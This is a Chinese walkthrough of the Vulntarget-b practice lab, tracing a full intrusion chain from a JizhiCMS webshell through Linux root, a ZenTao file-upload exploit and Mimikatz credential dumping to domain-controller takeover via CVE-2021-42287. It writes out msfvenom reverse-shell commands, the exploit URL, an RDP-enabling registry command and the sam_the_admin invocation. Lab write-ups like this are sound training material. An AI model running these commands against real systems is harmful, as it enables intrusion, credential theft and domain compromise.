前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulntarget-b靶场

Vulntarget-b靶场

作者头像
鸿鹄实验室
发布2022-11-02 16:57:57
8200
发布2022-11-02 16:57:57
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室

靶场地址:https://github.com/shengshengli/vulntarget

靶场拓展图

首先nmap进行端口扫描

nmap -sV -sS -sC 192.168.31.104

代码语言:javascript
复制
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=125.122.127.185/organizationName=BT-PANEL/stateOrProvinceName=Guangdong/countryName=CN
| Not valid before: 2021-12-20T06:49:15
|_Not valid after:  2031-09-19T06:49:15
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:0b:f2:25:18:99:fd:4d:c9:85:cf:e6:98:00:b9:05 (RSA)
|   256 7d:f8:b8:a2:81:d0:da:c1:26:34:ae:9d:9e:8f:36:a9 (ECDSA)
|_  256 78:b3:f9:a8:4b:33:2f:15:2d:bd:d1:25:3a:f8:d5:5f (ED25519)
80/tcp   open  http    nginx
|_http-title: \xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9
81/tcp   open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: \xE6\x9E\x81\xE8\x87\xB4CMS\xE5\xBB\xBA\xE7\xAB\x99\xE7\xB3\xBB\xE7\xBB\x9F
| http-robots.txt: 7 disallowed entries 
|_/A/ /Home/ /backup/ /cache/ /FrPHP/ /install/ /Conf/
888/tcp  open  http    nginx
|_http-title: 403 Forbidden
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    nginx
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: OSS-Labs BT Panel
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was http://192.168.31.104:8888/login
MAC Address: 4C:D5:77:CB:F4:99 (Chongqing Fugui Electronics)

21(ftp)不存在匿名登录 访问80端口,是一个宝塔

访问81端口,是一个极致CMS

访问8888端口,是宝塔后台的入口

从81端口找突破口, admin.php是极致CMS的后台地址,弱口令admin:admin123可以登录后台(也可以进行爆破)

进入后台,cms的版本为1.8.1,php版本为7.3.31 搜索发现可以通过添加插件(在线编辑模板)来getshell(参考:https://xz.aliyun.com/t/9359)

安装好插件,点击配置,配置一下用户和密码(不要忘记),然后再进入配置,点击提交会跳转到登录页面,使用自己设置好的用户和密码登录

登陆后就是网站的目录,并且权限还比较高,可以在php页面写一个shell

直接在index.php页面写入一句话,在index.php代码执行即可

在phpinfo页面发现disable_functions过滤了很多函数(比如能命令执行的system、passthru等) 可直接使用蚁剑插件来绕过disable_functions

只有www权限

使用ifconfig等查看网段是没回显的

msf生成一个反弹shell的elf文件,通过蚁剑上传到目标机器上

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.84 LPORT=1234 -f elf >shell.elf

msf进行监听端口-->运行elf文件-->上线msf,得到meterpreter

进入shell,发现有python,使用python获得一个交互shell

需要进行提权,先查看一些suid find / -user root -perm -4000 -print 2>/dev/null

有sudo可以用(CVE-2021-3156),还有一个pkexec(CVE-2021-4034),两个提权都可以

得到root权限 在/root目录下发现flag文件

在home目录下发现还有一个vulntarget用户

vulntarget:root弱口令可登录ssh

/www/wwwroot/jizhi/Conf/config.php文件发现连接数据库的用户名密码 admin:EcfMrPrtTJGL2GjL

ifconfig查看网络信息,还有一个10.0.20.30的网卡

上传fscan,来扫描10.0.20.30网段的存活主机,扫到一个10.0.20.66的主机,8080端口是禅道cms 还扫描到centos的ssh弱口令root:root

准备上线msf,生成elf文件,使用root用户执行,获得一个root权限的meterpreter

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.84 LPORT=5555 -f elf >shell.elf

将shell.elf上传到centos,msf进行监听,运行elf文件,成功上线msf

第一台centos已经拿下 使用msf来搭建代理,添加一个10.0.20网段的路由

使用msf6自带的socks模块:auxiliary/server/socks_proxy,这里使用socks5 设置好SRVHOST,SRVPORT

/etc/proxychains4.conf添加socks代理映射

proxychains4来进行操作 访问10.0.20.66的8080端口

访问index.php?mode=getconfig查看版本,版本为:12.4.2

搜索此版本的漏洞,可以文件上传 参考:https://blog.csdn.net/qq_36197704/article/details/109385695

admin:Admin123登录后台

在第一台机器(centos)开一个临时web服务,目录下写一个php一句话

HTTP://10.0.20.30:8081/shell.phpHTTP需大写

http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODA4MS9zaGVsbC5waHA=

访问此地址,临时web服务器下的shell.php会被写入到data/client/1/目录下

蚁剑挂代理 进行连接,whoami查看一下权限,权限比较低

tasklist查看一下进行发现存在火绒

进行免杀,上线msf,权限是比较低的,需要进行提权

随手一试getsystem可以提权成功.....

进行抓取密码

load kiwi creds_all

抓到administrator和域成员的hash,进行hash解码

代码语言:javascript
复制
administrator:admin@123
win101:admin#123(域成员账号,需要登录一次否则抓不到)

C:\Users\administrator目录下发现flag

使用注册表来开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

ipconfig /all查看网络信息,win10的另一个网卡ip为10.0.10.99 win10在域环境中,域名为vulntarget.com 域控ip为:10.0.10.100

net group "domain controllers" /domain查看域控名:WIN-UH20PRD3EAO

使用scaninfo进行扫描,发现可以利用ms17010漏洞,发现利用ms17010会使域控蓝屏重启,放弃此漏洞

使用CVE-2021-42287

代码语言:javascript
复制
由于Active Directory没有对域中计算机与服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码

使用域成员的用户和密码

代码语言:javascript
复制
python sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell

获得域控的system权限

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-07-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 靶场拓展图
相关产品与服务
云数据库 MySQL
腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档